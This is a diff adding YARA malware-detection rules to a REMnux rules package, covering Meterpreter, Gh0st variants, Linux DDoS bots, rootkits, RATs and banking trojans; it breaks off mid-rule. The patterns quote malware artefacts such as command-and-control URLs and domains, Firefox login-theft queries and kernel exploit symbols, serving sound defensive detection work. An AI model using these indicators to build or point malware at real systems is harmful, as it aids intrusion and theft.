--- remnux-rules-0.0.3/yara/malware/Meterpreter_Reverse_Tcp.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Meterpreter_Reverse_Tcp.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,19 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+rule Meterpreter_Reverse_Tcp { 
+  meta: // This is the standard backdoor/RAT from Metasploit, could be used by any actor 
+    author = "chort (@chort0)" 
+    description = "Meterpreter reverse TCP backdoor in memory. Tested on Win7x64." 
+  strings: 
+    $a = { 4d 45 54 45 52 50 52 45 54 45 52 5f 54 52 41 4e 53 50 4f 52 54 5f 53 53 4c [32-48] 68 74 74 70 73 3a 2f 2f 58 58 58 58 58 58 } // METERPRETER_TRANSPORT_SSL … https://XXXXXX 
+    $b = { 4d 45 54 45 52 50 52 45 54 45 52 5f 55 41 } // METERPRETER_UA 
+    $c = { 47 45 54 20 2f 31 32 33 34 35 36 37 38 39 20 48 54 54 50 2f 31 2e 30 } // GET /123456789 HTTP/1.0 
+    $d = { 6d 65 74 73 72 76 2e 64 6c 6c [2-4] 52 65 66 6c 65 63 74 69 76 65 4c 6f 61 64 65 72 } // metsrv.dll … ReflectiveLoader 
+    
+  condition: 
+    $a or (any of ($b, $d) and $c) 
+  }
+
+
diff -Nru remnux-rules-0.0.3/yara/malware/Miancha.yar remnux-rules-0.0.4/yara/malware/Miancha.yar
--- remnux-rules-0.0.3/yara/malware/Miancha.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Miancha.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,40 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+rule Trojan_W32_Gh0stMiancha_1_0_0
+{
+    meta:
+        Author      = "Context Threat Intelligence"
+        Date        = "2014/01/27"
+        Description = "Bytes inside"
+        Reference   = "http://www.contextis.com/documents/30/TA10009_20140127_-_CTI_Threat_Advisory_-_The_Monju_Incident1.pdf"
+
+    strings:
+        $0x = { 57 5b 5a 5a 51 57 40 34 31 67 2e 31 70 34 5c 40 40 44 3b 25 3a 19 1e 5c 7b 67 60 2e 34 31 67 2e 31 70 19 1e 55 77 77 71 64 60 2e 34 3e 3b 3e 19 1e 57 7b 7a 60 71 7a 60 39 40 6d 64 71 2e 34 60 71 6c 60 3b 7c 60 79 78 19 1e 44 66 7b 6c 6d 39 57 7b 7a 7a 71 77 60 7d 7b 7a 2e 34 5f 71 71 64 39 55 78 7d 62 71 19 1e 57 7b 7a 60 71 7a 60 39 78 71 7a 73 60 7c 2e 34 24 19 1e 19 1e }
+        $1 = { 5c e7 99 bd e5 8a a0 e9 bb 91 5c }
+        $1x = { 48 f3 8d a9 f1 9e b4 fd af 85 48 }
+        $2 = "DllCanLoadNow"
+        $2x = { 50 78 78 57 75 7a 58 7b 75 70 5a 7b 63 }
+        $3x = { 5a 61 79 76 71 66 34 7b 72 34 67 61 76 7f 71 6d 67 2e 34 31 70 } 
+        $4 = "JXNcc2hlbGxcb3Blblxjb21tYW5k"
+        $4x = { 5e 4c 5a 77 77 26 7c 78 76 53 6c 77 76 27 56 78 76 78 6c 7e 76 26 25 60 4d 43 21 7f }
+        $5 = "SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA=="
+        $5x = { 47 51 52 47 46 52 70 56 41 7f 42 77 46 51 42 40 45 25 5e 5e 41 52 46 5e 40 24 21 77 41 27 78 6e 70 53 42 60 4c 51 5a 78 76 7a 46 6d 4d 43 6c 45 77 79 2d 7e 4e 4c 5a 6e 76 27 5e 77 59 55 29 29 }
+        $6 = "C:\\Users\\why\\"
+        $6x = { 57 2e 48 41 67 71 66 67 48 63 7c 6d 48 }
+        $7 = "g:\\ykcx\\"
+        $7x = { 73 2E 48 6D 7F 77 6C 48 }
+        $8 = "(miansha)"
+        $8x = { 3C 79 7D 75 7A 67 7C 75 3D }
+        $9 = "server(\xE5\xA3\xB3)"
+        $9x = { 7C 2E 48 26 24 25 27 3A 25 25 3A 26 21 48 67 71 66 62 71 66 3C F1 B7 A7 3D 48 46 71 78 71 75 67 71 48 67 71 66 62 71 66 3A 64 70 76 }
+        $cfgDecode = { 8a ?? ?? 80 c2 7a 80 f2 19 88 ?? ?? 41 3b ce 7c ??}
+
+   condition:
+       any of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/MiniAsp3_mem.yar remnux-rules-0.0.4/yara/malware/MiniAsp3_mem.yar
--- remnux-rules-0.0.3/yara/malware/MiniAsp3_mem.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/MiniAsp3_mem.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,16 @@
+rule MiniAsp3_mem { 
+  meta: author = "chort (@chort0)"
+  description = "Detect MiniASP3 in memory"
+  strings: 
+    $pdb = "MiniAsp3\\Release\\MiniAsp.pdb" fullword 
+    $httpAbout = "http://%s/about.htm" fullword 
+    $httpResult = "http://%s/result_%s.htm" fullword 
+    $msgInetFail = "open internet failed…" fullword 
+    $msgRunErr = "run error!" fullword 
+    $msgRunOk = "run ok!" fullword
+    $msgTimeOutM0 = "time out,change to mode 0" fullword 
+    $msgCmdNull = "command is null!" fullword 
+condition:
+  ($pdb and (all of ($http*)) and any of ($msg*))
+  }
+  
diff -Nru remnux-rules-0.0.3/yara/malware/Miscelanea_Linux.yar remnux-rules-0.0.4/yara/malware/Miscelanea_Linux.yar
--- remnux-rules-0.0.3/yara/malware/Miscelanea_Linux.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Miscelanea_Linux.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,187 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+rule LinuxAESDDoS
+{
+    meta:
+	Author = "@benkow_"
+	Date = "2014/09/12"
+	Description = "Strings inside"
+        Reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483"
+
+    strings:
+        $a = "3AES"
+        $b = "Hacker"
+        $c = "VERSONEX"
+
+    condition:
+        2 of them
+}
+
+rule LinuxBillGates 
+{
+    meta:
+       Author      = "@benkow_"
+       Date        = "2014/08/11" 
+       Description = "Strings inside"
+       Reference   = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3429" 
+
+    strings:
+        $a= "12CUpdateGates"
+        $b= "11CUpdateBill"
+
+    condition:
+        $a and $b
+}
+
+rule LinuxElknot
+{
+    meta:
+	Author      = "@benkow_"
+        Date        = "2013/12/24" 
+        Description = "Strings inside"
+        Reference   = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3099"
+
+    strings:
+        $a = "ZN8CUtility7DeCryptEPciPKci"
+	$b = "ZN13CThreadAttack5StartEP11CCmdMessage"
+
+    condition:
+	all of them
+}
+
+rule LinuxMrBlack
+{
+    meta:
+	Author      = "@benkow_"
+        Date        = "2014/09/12" 
+        Description = "Strings inside"
+        Reference   = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483"
+
+    strings:
+        $a = "Mr.Black"
+	$b = "VERS0NEX:%s|%d|%d|%s"
+    condition:
+        $a and $b
+}
+
+rule LinuxTsunami
+{
+    meta:
+	
+		Author      = "@benkow_"
+		Date        = "2014/09/12" 
+		Description = "Strings inside"
+		Reference   = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483"
+
+    strings:
+        $a = "PRIVMSG %s :[STD]Hitting %s"
+        $b = "NOTICE %s :TSUNAMI <target> <secs>"
+        $c = "NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually."
+    condition:
+        $a or $b or $c
+}
+
+rule rootkit
+{
+	meta:
+                author="xorseed"
+                reference= "https://stuff.rop.io/"
+	strings:
+		$sys1 = "sys_write" nocase ascii wide	
+		$sys2 = "sys_getdents" nocase ascii wide
+		$sys3 = "sys_getdents64" nocase ascii wide
+		$sys4 = "sys_getpgid" nocase ascii wide
+		$sys5 = "sys_getsid" nocase ascii wide
+		$sys6 = "sys_setpgid" nocase ascii wide
+		$sys7 = "sys_kill" nocase ascii wide
+		$sys8 = "sys_tgkill" nocase ascii wide
+		$sys9 = "sys_tkill" nocase ascii wide
+		$sys10 = "sys_sched_setscheduler" nocase ascii wide
+		$sys11 = "sys_sched_setparam" nocase ascii wide
+		$sys12 = "sys_sched_getscheduler" nocase ascii wide
+		$sys13 = "sys_sched_getparam" nocase ascii wide
+		$sys14 = "sys_sched_setaffinity" nocase ascii wide
+		$sys15 = "sys_sched_getaffinity" nocase ascii wide
+		$sys16 = "sys_sched_rr_get_interval" nocase ascii wide
+		$sys17 = "sys_wait4" nocase ascii wide
+		$sys18 = "sys_waitid" nocase ascii wide
+		$sys19 = "sys_rt_tgsigqueueinfo" nocase ascii wide
+		$sys20 = "sys_rt_sigqueueinfo" nocase ascii wide
+		$sys21 = "sys_prlimit64" nocase ascii wide
+		$sys22 = "sys_ptrace" nocase ascii wide
+		$sys23 = "sys_migrate_pages" nocase ascii wide
+		$sys24 = "sys_move_pages" nocase ascii wide
+		$sys25 = "sys_get_robust_list" nocase ascii wide
+		$sys26 = "sys_perf_event_open" nocase ascii wide
+		$sys27 = "sys_uname" nocase ascii wide
+		$sys28 = "sys_unlink" nocase ascii wide
+		$sys29 = "sys_unlikat" nocase ascii wide
+		$sys30 = "sys_rename" nocase ascii wide
+		$sys31 = "sys_read" nocase ascii wide
+		$sys32 = "kobject_del" nocase ascii wide
+		$sys33 = "list_del_init" nocase ascii wide
+		$sys34 = "inet_ioctl" nocase ascii wide
+	condition:
+		9 of them
+}
+
+rule exploit
+{
+        meta:
+                author="xorseed"
+                reference= "https://stuff.rop.io/"
+	strings:
+		$xpl1 = "set_fs_root" nocase ascii wide
+		$xpl2 = "set_fs_pwd" nocase ascii wide
+		$xpl3 = "__virt_addr_valid" nocase ascii wide
+		$xpl4 = "init_task" nocase ascii wide
+		$xpl5 = "init_fs" nocase ascii wide
+		$xpl6 = "bad_file_ops" nocase ascii wide
+		$xpl7 = "bad_file_aio_read" nocase ascii wide
+		$xpl8 = "security_ops" nocase ascii wide
+		$xpl9 = "default_security_ops" nocase ascii wide
+		$xpl10 = "audit_enabled" nocase ascii wide
+		$xpl11 = "commit_creds" nocase ascii wide
+		$xpl12 = "prepare_kernel_cred" nocase ascii wide
+		$xpl13 = "ptmx_fops" nocase ascii wide
+		$xpl14 = "node_states" nocase ascii wide
+	condition:
+		7 of them
+}
+
+rule ldpreload
+{
+        meta:
+                author="xorseed"
+                reference= "https://stuff.rop.io/"
+	strings:
+		$a = "dlopen" nocase ascii wide
+		$b = "dlsym" nocase ascii wide
+		$c = "fopen" nocase ascii wide
+		$d = "fopen64" nocase ascii wide
+		$e = "__fxstat" nocase ascii wide
+		$f = "__fxstat64" nocase ascii wide
+		$g = "accept" nocase ascii wide
+		$h = "__lxstat" nocase ascii wide
+		$i = "__lxstat64" nocase ascii wide
+		$j = "open" nocase ascii wide
+		$k = "rmdir" nocase ascii wide
+		$l = "__xstat" nocase ascii wide
+		$m = "__xstat64" nocase ascii wide
+		$n = "unlink" nocase ascii wide
+		$o = "unlikat" nocase ascii wide
+		$p = "fdopendir" nocase ascii wide
+		$q = "opendir" nocase ascii wide
+		$r = "readdir" nocase ascii wide
+		$s = "readdir64" nocase ascii wide
+	condition:
+		($a or $b) and 5 of them
+}
+
+
diff -Nru remnux-rules-0.0.3/yara/malware/Miscelanea_RTF.yar remnux-rules-0.0.4/yara/malware/Miscelanea_RTF.yar
--- remnux-rules-0.0.3/yara/malware/Miscelanea_RTF.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Miscelanea_RTF.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,25 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+rule rtf_multiple
+{
+meta:
+	author = "@patrickrolsen"
+	maltype = "Multiple"
+	version = "0.1"
+	reference = "fd69a799e21ccb308531ce6056944842" 
+	date = "01/04/2014"
+strings:
+	$rtf = { 7b 5c 72 74 ?? ?? } // {\rt01 {\rtf1 {\rtxa
+    	$string1  = "author user"
+	$string2   = "title Vjkygdjdtyuj" nocase
+	$string3    = "company ooo"
+	$string4  = "password 00000000"
+condition:
+    ($rtf at 0) and (all of ($string*))
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Miscelanea.yar remnux-rules-0.0.4/yara/malware/Miscelanea.yar
--- remnux-rules-0.0.3/yara/malware/Miscelanea.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Miscelanea.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,906 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule tran_duy_linh
+{
+meta:
+	author = "@patrickrolsen"
+	maltype = "Misc."
+	version = "0.2"
+	reference = "8fa804105b1e514e1998e543cd2ca4ea, 872876cfc9c1535cd2a5977568716ae1, etc." 
+	date = "01/03/2014"
+strings:
+	$doc = {D0 CF 11 E0} //DOCFILE0
+	$string1 = "Tran Duy Linh" fullword
+	$string2 = "DLC Corporation" fullword
+condition:
+    ($doc at 0) and (all of ($string*))
+}
+
+rule misc_iocs
+{
+meta:
+	author = "@patrickrolsen"
+	maltype = "Misc."
+	version = "0.1"
+	reference = "N/A" 
+strings:
+	$doc = {D0 CF 11 E0} //DOCFILE0
+	$s1 = "dw20.exe"
+	$s2 = "cmd /"
+condition:
+    ($doc at 0) and (1 of ($s*))
+}
+
+rule malicious_LNK_files
+{
+meta:
+	author = "@patrickrolsen"
+strings:
+	$magic = {4C 00 00 00 01 14 02 00} // L.......
+	$s1 = "\\RECYCLER\\" wide
+	$s2 = "%temp%" wide
+	$s3 = "%systemroot%\\system32\\cmd.exe" wide
+	//$s4 = "./start" wide
+	$s5 = "svchost.exe" wide
+	$s6 = "lsass.exe" wide
+	$s7 = "csrss.exe" wide
+	$s8 = "winlogon.exe" wide
+	//$s9 = "%cd%" wide
+	$s10 = "%appdata%" wide
+	$s11 = "%programdata%" wide
+	$s12 = "%localappdata%" wide
+	$s13 = ".cpl" wide
+condition:
+	($magic at 0) and any of ($s*)
+}
+
+rule memory_pivy
+
+{
+   meta:
+	  author = "https://github.com/jackcr/"
+   strings:
+      $a = {00 00 00 00 00 00 00 00 00 00 00 53 74 75 62 50 61 74 68 00} // presence of pivy in memory
+
+   condition: 
+      any of them
+
+}
+
+rule memory_shylock
+
+{
+   meta:
+	  author = "https://github.com/jackcr/"
+
+   strings:
+      $a = /pipe\\[A-F0-9]{32}/     //Named pipe created by the malware
+      $b = /id=[A-F0-9]{32}/     //Portion or the uri beacon
+      $c = /MASTER_[A-F0-9]{32}/     //Mutex created by the malware
+      $d = "***Load injects by PIPE (%s)" //String found in binary
+      $e = "***Load injects url=%s (%s)" //String found in binary
+      $f = "*********************** Ping Ok ************************" //String found in binary
+      $g = "*** LOG INJECTS *** %s"     //String found in binary
+
+   condition: 
+      any of them
+
+}
+
+rule ScanBox_Malware_Generic {
+	meta:
+		description = "Scanbox Chinese Deep Panda APT Malware http://goo.gl/MUUfjv and http://goo.gl/WXUQcP"
+		author = "Florian Roth"
+		reference1 = "http://goo.gl/MUUfjv"
+		reference2 = "http://goo.gl/WXUQcP"
+		date = "2015/02/28"
+		hash1 = "8d168092d5601ebbaed24ec3caeef7454c48cf21366cd76560755eb33aff89e9"
+		hash2 = "d4be6c9117db9de21138ae26d1d0c3cfb38fd7a19fa07c828731fa2ac756ef8d"
+		hash3 = "3fe208273288fc4d8db1bf20078d550e321d9bc5b9ab80c93d79d2cb05cbf8c2"
+	strings:
+		/* Sample 1 */
+		$s0 = "http://142.91.76.134/p.dat" fullword ascii
+		$s1 = "HttpDump 1.1" fullword ascii
+		
+		/* Sample 2 */
+		$s3 = "SecureInput .exe" fullword wide
+		$s4 = "http://extcitrix.we11point.com/vpn/index.php?ref=1" fullword ascii
+		
+		/* Sample 3 */
+		$s5 = "%SystemRoot%\\System32\\svchost.exe -k msupdate" fullword ascii
+		$s6 = "ServiceMaix" fullword ascii		
+		
+		/* Certificate and Keywords */
+		$x1 = "Management Support Team1" fullword ascii
+		$x2 = "DTOPTOOLZ Co.,Ltd.0" fullword ascii
+		$x3 = "SEOUL1" fullword ascii
+	condition:
+		( 1 of ($s*) and 2 of ($x*) ) or 
+		( 3 of ($x*) )
+}
+
+rule TrojanDownloader {
+	meta:
+		description = "Trojan Downloader - Flash Exploit Feb15"
+		author = "Florian Roth"
+		reference = "http://goo.gl/wJ8V1I"
+		date = "2015/02/11"
+		hash = "5b8d4280ff6fc9c8e1b9593cbaeb04a29e64a81e"
+		score = 60
+	strings:
+		$x1 = "Hello World!" fullword ascii
+		$x2 = "CONIN$" fullword ascii
+			
+		$s6 = "GetCommandLineA" fullword ascii
+		$s7 = "ExitProcess" fullword ascii
+		$s8 = "CreateFileA" fullword ascii						
+
+		$s5 = "SetConsoleMode" fullword ascii		
+		$s9 = "TerminateProcess" fullword ascii	
+		$s10 = "GetCurrentProcess" fullword ascii
+		$s11 = "UnhandledExceptionFilter" fullword ascii
+		$s3 = "user32.dll" fullword ascii
+		$s16 = "GetEnvironmentStrings" fullword ascii
+		$s2 = "GetLastActivePopup" fullword ascii		
+		$s17 = "GetFileType" fullword ascii
+		$s19 = "HeapCreate" fullword ascii
+		$s20 = "VirtualFree" fullword ascii
+		$s21 = "WriteFile" fullword ascii
+		$s22 = "GetOEMCP" fullword ascii
+		$s23 = "VirtualAlloc" fullword ascii
+		$s24 = "GetProcAddress" fullword ascii
+		$s26 = "FlushFileBuffers" fullword ascii
+		$s27 = "SetStdHandle" fullword ascii
+		$s28 = "KERNEL32.dll" fullword ascii
+	condition:
+		$x1 and $x2 and ( all of ($s*) ) and filesize < 35000
+}
+
+
+rule Cloaked_as_JPG {
+        meta:
+                description = "Detects a cloaked file as JPG"
+                author = "Florian Roth (eval section from Didier Stevens)"
+                date = "2015/02/29"
+                score = 70
+        strings:
+                $ext = "extension: .jpg"
+        condition:
+                $ext and uint16be(0x00) != 0xFFD8
+}
+
+
+
+rule rtf_yahoo_ken
+{
+meta:
+	author = "@patrickrolsen"
+	maltype = "Yahoo Ken"
+	filetype = "RTF"
+	version = "0.1"
+	description = "Test rule"
+	date = "2013-12-14"
+strings:
+	$magic1 = { 7b 5c 72 74 30 31 } // {\rt01
+	$magic2 = { 7b 5c 72 74 66 31 } // {\rtf1
+	$magic3 = { 7b 5c 72 74 78 61 33 } // {\rtxa3
+	$author1 = { 79 61 68 6f 6f 20 6b 65 63 } // "yahoo ken"
+condition:
+	($magic1 or $magic2 or $magic3 at 0) and $author1
+} 
+
+
+rule ZXProxy
+{
+meta:
+	author = "ThreatConnect Intelligence Research Team"
+	
+strings:
+	$C = "\\Control\\zxplug" nocase wide ascii
+	$h = "http://www.facebook.com/comment/update.exe" wide ascii
+	$S = "Shared a shell to %s:%s Successfully" nocase wide ascii
+condition:
+	any of them
+}
+
+rule OrcaRAT
+{
+    meta:
+        Author      = "PwC Cyber Threat Operations"
+        Date        = "2014/10/20" 
+        Description = "Strings inside"
+        Reference   = "http://pwc.blogs.com/cyber_security_updates/2014/10/orcarat-a-whale-of-a-tale.html"
+
+    strings:
+        $MZ = "MZ"
+        $apptype1 = "application/x-ms-application"
+        $apptype2 = "application/x-ms-xbap"
+        $apptype3 = "application/vnd.ms-xpsdocument"
+        $apptype4 = "application/xaml+xml"
+        $apptype5 = "application/x-shockwave-flash"
+        $apptype6 = "image/pjpeg"
+        $err1 = "Set return time error =   %d!"
+        $err2 = "Set return time   success!"
+        $err3 = "Quit success!"
+
+    condition:
+        $MZ at 0 and filesize < 500KB and (all of ($apptype*) and 1 of ($err*))
+}
+
+rule EmiratesStatement 
+{
+	meta:
+		Author 		= "Christiaan Beek"
+		Date 		= "2013-06-30"
+		Description = "Credentials Stealing Attack"
+		Reference 	= "https://blogs.mcafee.com/mcafee-labs/targeted-campaign-steals-credentials-in-gulf-states-and-caribbean"
+		
+		hash0 = "0e37b6efe5de1cc9236017e003b1fc37"
+		hash1 = "a28b22acf2358e6aced43a6260af9170"
+		hash2 = "6f506d7adfcc2288631ed2da37b0db04"
+		hash3 = "8aebade47dc1aa9ac4b5625acf5ade8f"
+	
+	strings:
+		$string0 = "msn.klm"
+		$string1 = "wmsn.klm"
+		$string2 = "bms.klm"
+	
+	condition:
+		all of them
+}
+
+rule PUP_InstallRex_AntiFWb {
+	meta:
+		description = "Malware InstallRex / AntiFW"
+		author = "Florian Roth"
+		date = "2015-05-13"
+		hash = "bb5607cd2ee51f039f60e32cf7edc4e21a2d95cd"
+		score = 65
+	strings:
+		$s4 = "Error %u while loading TSU.DLL %ls" fullword ascii
+		$s7 = "GetModuleFileName() failed => %u" fullword ascii
+		$s8 = "TSULoader.exe" fullword wide
+		$s15 = "\\StringFileInfo\\%04x%04x\\Arguments" fullword wide
+		$s17 = "Tsu%08lX.dll" fullword wide
+	condition:
+		uint16(0) == 0x5a4d and all of them
+}
+
+rule LightFTP_fftp_x86_64 {
+	meta:
+		description = "Detects a light FTP server"
+		author = "Florian Roth"
+		reference = "https://github.com/hfiref0x/LightFTP"
+		date = "2015-05-14"
+		hash1 = "989525f85abef05581ccab673e81df3f5d50be36"
+		hash2 = "5884aeca33429830b39eba6d3ddb00680037faf4"
+		score = 50
+	strings:
+		$s1 = "fftp.cfg" fullword wide
+		$s2 = "220 LightFTP server v1.0 ready" fullword ascii
+		$s3 = "*FTP thread exit*" fullword wide
+		$s4 = "PASS->logon successful" fullword ascii
+		$s5 = "250 Requested file action okay, completed." fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 250KB and 4 of them
+}
+
+rule LightFTP_Config {
+	meta:
+		description = "Detects a light FTP server - config file"
+		author = "Florian Roth"
+		reference = "https://github.com/hfiref0x/LightFTP"
+		date = "2015-05-14"
+		hash = "ce9821213538d39775af4a48550eefa3908323c5"
+	strings:
+		$s2 = "maxusers=" wide
+		$s6 = "[ftpconfig]" fullword wide
+		$s8 = "accs=readonly" fullword wide
+		$s9 = "[anonymous]" fullword wide
+		$s10 = "accs=" fullword wide
+		$s11 = "pswd=" fullword wide
+	condition:
+		uint16(0) == 0xfeff and filesize < 1KB and all of them
+}
+
+rule SpyGate_v2_9
+{
+	meta:
+		date = "2014/09"
+		maltype = "Spygate v2.9 Remote Access Trojan"
+		filetype = "exe"
+		reference = "https://blogs.mcafee.com/mcafee-labs/middle-east-developer-spygate-struts-stuff-online"
+	strings:
+		$1 = "shutdowncomputer" wide
+		$2 = "shutdown -r -t 00" wide
+		$3 = "blockmouseandkeyboard" wide
+		$4 = "ProcessHacker"
+		$5 = "FileManagerSplit" wide
+	condition:
+		all of them
+}
+
+rule PythoRAT
+{
+	meta:
+		author = " Kevin Breen <kevin@techanarchy.net>"
+		date = "2014/04"
+		ref = "http://malwareconfig.com/stats/PythoRAT"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
+
+	strings:
+		$a = "TKeylogger"
+		$b = "uFileTransfer"
+		$c = "TTDownload"
+		$d = "SETTINGS"
+		$e = "Unknown" wide
+		$f = "#@#@#"
+		$g = "PluginData"
+		$i = "OnPluginMessage"
+
+	condition:
+		all of them
+}
+
+rule VirusRat
+{
+	meta:
+		author = " Kevin Breen <kevin@techanarchy.net>"
+		date = "2014/04"
+		ref = "http://malwareconfig.com/stats/VirusRat"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
+
+	strings:
+		$string0 = "virustotal"
+		$string1 = "virusscan"
+		$string2 = "abccba"
+		$string3 = "pronoip"
+		$string4 = "streamWebcam"
+		$string5 = "DOMAIN_PASSWORD"
+		$string6 = "Stub.Form1.resources"
+		$string7 = "ftp://{0}@{1}" wide
+		$string8 = "SELECT * FROM moz_logins" wide
+		$string9 = "SELECT * FROM moz_disabledHosts" wide
+		$string10 = "DynDNS\\Updater\\config.dyndns" wide
+		$string11 = "|BawaneH|" wide
+
+	condition:
+		all of them
+}
+
+rule ice_ix_12xy : banker
+{
+	meta:
+		author = "Jean-Philippe Teissier / @Jipe_"
+		description = "ICE-IX 1.2.x.y trojan banker"
+		date = "2013-01-12"
+		filetype = "memory"
+		version = "1.0" 
+	
+	strings:
+		$regexp1= /bn1=.{32}&sk1=[0-9a-zA-Z]{32}/
+		$a = "bn1="
+		$b = "&sk1="
+		$c = "mario"								//HardDrive GUID artifact
+		$d = "FIXME"
+		$e = "RFB 003.003"							//VNC artifact
+		$ggurl = "http://www.google.com/webhp"
+
+	condition:
+		$regexp1 or ($a and $b) or all of ($c,$d,$e,$ggurl) 
+}
+rule qadars : banker
+{
+	meta:
+		author = "Jean-Philippe Teissier / @Jipe_"
+		description = "Qadars - Mobile part. Maybe Perkele."
+		version = "1.0" 
+		filetype = "memory"
+		ref1 = "http://www.lexsi-leblog.fr/cert/qadars-nouveau-malware-bancaire-composant-mobile.html"
+
+	strings:
+		$cmd1 = "m?D"
+		$cmd2 = "m?S"
+		$cmd3 = "ALL"
+		$cmd4 = "FILTER"
+		$cmd5 = "NONE"
+		$cmd6 = "KILL"
+		$cmd7 = "CANCEL"
+		$cmd8 = "SMS"
+		$cmd9 = "DIVERT"
+		$cmd10 = "MESS"
+		$nofilter = "nofilter1111111"
+		$botherderphonenumber1 = "+380678409210"
+
+	condition:
+		all of ($cmd*) or $nofilter or any of ($botherderphonenumber*)
+}
+rule shylock :  banker
+{
+	meta:
+		author = "Jean-Philippe Teissier / @Jipe_"
+		description = "Shylock Banker"
+		date = "2013-12-12" 
+		version = "1.0" 
+		ref1 = "http://iocbucket.com/iocs/1b4660d57928df5ca843c21df0b2adb117026cba"
+		ref2 = "http://www.trusteer.com/blog/merchant-fraud-returns-%E2%80%93-shylock-polymorphic-financial-malware-infections-rise"
+		ref3 = "https://www.csis.dk/en/csis/blog/3811/"
+
+	strings:
+		$process1 = "MASTER"
+		$process2 = "_SHUTDOWN"
+		$process3 = "EVT_VNC"
+		$process4 = "EVT_BACK"
+		$process5 = "EVT_VNC"
+		$process6 = "IE_Hook::GetRequestInfo"
+		$process7 = "FF_Hook::getRequestInfo"
+		$process8 = "EX_Hook::CreateProcess"
+		$process9 = "hijackdll.dll"
+		$process10 = "MTX_"
+		$process11 = "FF::PR_WriteHook entry"
+		$process12 = "FF::PR_WriteHook exit"
+		$process13 = "HijackProcessAttach::*** MASTER *** MASTER *** MASTER *** %s PID=%u"
+		$process14 = "HijackProcessAttach::entry"
+		$process15 = "FF::BEFORE INJECT"
+		$process16 = "FF::AFTER INJECT"
+		$process17 = "IE::AFTER INJECT"
+		$process18 = "IE::BEFORE INJECT"
+		$process19 = "*** VNC *** VNC *** VNC *** VNC *** VNC *** VNC *** VNC *** VNC *** VNC *** VNC *** %s"
+		$process20 = "*** LOG INJECTS *** %s"
+		$process21 = "*** inject to process %s not allowed"
+		$process22 = "*** BackSocks *** BackSocks *** BackSocks *** BackSocks *** BackSocks *** BackSocks *** BackSocks *** %s"
+		$process23 = ".?AVFF_Hook@@"
+		$process24 = ".?AVIE_Hook@@"
+		$process25 = "Inject::InjectDllFromMemory"
+		$process26 = "BadSocks.dll"	
+		$domain1 = "extensadv.cc"
+		$domain2 = "topbeat.cc"
+		$domain3 = "brainsphere.cc"
+		$domain4 = "commonworldme.cc"
+		$domain5 = "gigacat.cc"
+		$domain6 = "nw-serv.cc"
+		$domain7 = "paragua-analyst.cc"
+		
+	condition:
+		3 of ($process*) or any of ($domain*)
+}
+rule spyeye : banker
+{
+	meta:
+		author = "Jean-Philippe Teissier / @Jipe_"
+		description = "SpyEye X.Y memory"
+		date = "2012-05-23" 
+		version = "1.0" 
+		filetype = "memory"
+
+	strings:
+		$spyeye = "SpyEye"
+		$a = "%BOTNAME%"
+		$b = "globplugins"
+		$c = "data_inject"
+		$d = "data_before"
+		$e = "data_after"
+		$f = "data_end"
+		$g = "bot_version"
+		$h = "bot_guid"
+		$i = "TakeBotGuid"
+		$j = "TakeGateToCollector"
+		$k = "[ERROR] : Omfg! Process is still active? Lets kill that mazafaka!"
+		$l = "[ERROR] : Update is not successfull for some reason"
+		$m = "[ERROR] : dwErr == %u"
+		$n = "GRABBED DATA"
+		
+	condition:
+		$spyeye or (any of ($a,$b,$c,$d,$e,$f,$g,$h,$i,$j,$k,$l,$m,$n))
+}
+
+rule spyeye_plugins : banker
+{
+	meta:
+		author = "Jean-Philippe Teissier / @Jipe_"
+		description = "SpyEye X.Y Plugins memory"
+		date = "2012-05-23" 
+		version = "1.0" 
+		filetype = "memory"
+
+	strings:
+		$a = "webfakes.dll"
+		$b = "config.dat"			//may raise some FP
+		$c = "collectors.txt"
+		$d = "webinjects.txt"
+		$e = "screenshots.txt"
+		$f = "billinghammer.dll"
+		$g = "block.dll"			//may raise some FP
+		$h = "bugreport.dll"		//may raise some FP
+		$i = "ccgrabber.dll"
+		$j = "connector2.dll"
+		$k = "creditgrab.dll"
+		$l = "customconnector.dll"
+		$m = "ffcertgrabber.dll"
+		$n = "ftpbc.dll"
